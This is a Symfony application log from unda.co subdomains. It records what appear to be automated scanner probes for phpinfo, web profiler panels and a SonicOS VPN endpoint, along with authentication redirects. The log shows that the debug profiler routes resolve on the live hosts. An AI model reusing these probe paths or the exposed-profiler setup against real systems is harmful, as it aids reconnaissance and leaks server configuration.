[2025-12-20 11:13:20] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:13:20] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:13:20] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:13:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:13:24] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:13:24] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 11:13:24] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:13:24] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:13:24] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:13:24] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:13:24] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:13:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-20 11:13:29] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 11:13:29] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:13:29] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:13:29] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:13:29] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:13:29] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:13:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:13:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:13:44] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-20 11:13:44] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 11:13:44] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:13:44] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:13:44] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:13:44] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:13:44] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:13:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:13:58] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:13:58] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 11:13:58] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:13:58] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:13:58] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:13:58] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:13:58] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:14:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:14:09] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-20 11:14:09] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 11:14:09] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:14:09] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 11:14:09] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:14:09] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:14:09] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:14:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:14:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2882d9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2882d9?panel=router","method":"GET"} []
[2025-12-20 11:14:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-20 11:14:36] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-20 11:17:11] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:17:11] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:17:11] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:17:11] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 11:17:11] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:17:11] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:17:11] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:17:11] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:17:11] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:17:14] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
[2025-12-20 11:17:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:17:28] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 11:17:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 11:17:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:17:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:17:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:17:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:17:28] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:17:30] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-20 11:17:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:17:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"40ceeb","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/40ceeb?panel=request","method":"GET"} []
[2025-12-20 11:17:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 11:18:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2882d9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2882d9?panel=validator","method":"GET"} []
[2025-12-20 11:18:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-20 11:20:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00ba25","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/00ba25?panel=cache","method":"GET"} []
[2025-12-20 11:20:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 11:21:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fc62b3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fc62b3?panel=dump","method":"GET"} []
[2025-12-20 11:21:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-20 11:22:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=twig","method":"GET"} []
[2025-12-20 11:22:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 11:25:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/sonicos/is-sslvpn-enabled"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/sonicos/is-sslvpn-enabled\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:25:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /__api__/v1/config/domains"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /__api__/v1/config/domains\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:26:16] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://ec2-35-175-10-94.compute-1.amazonaws.com/","method":"GET"} []
[2025-12-20 11:26:19] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://ec2-35-175-10-94.compute-1.amazonaws.com/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:26:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=request","method":"GET"} []
[2025-12-20 11:26:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 11:31:52] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 11:31:52] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 11:31:52] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:31:52] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:31:52] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:31:52] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:31:52] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:31:53] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 11:31:53] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 11:31:53] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:31:53] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:31:53] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:31:53] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:31:53] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:31:56] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-20 11:32:02] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:32:02] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 11:32:02] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:32:02] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:32:02] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:32:02] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:32:02] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:32:07] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
[2025-12-20 11:32:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:32:23] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 11:32:23] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 11:32:23] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:32:23] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:32:23] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 11:32:23] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 11:32:23] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 11:32:26] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-20 11:32:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 11:32:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00ba25","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/00ba25","method":"GET"} []
[2025-12-20 11:32:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 11:32:43] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 11:32:43] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 11:32:43] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 11:32:43] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
